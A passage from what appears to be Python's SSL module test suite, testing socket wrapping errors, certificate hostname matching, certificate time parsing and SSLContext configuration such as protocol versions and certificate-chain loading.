with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if support.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if support.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@requires_minimum_version
@unittest.skipIf(IS_LIBRESSL, "see bpo-34001")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
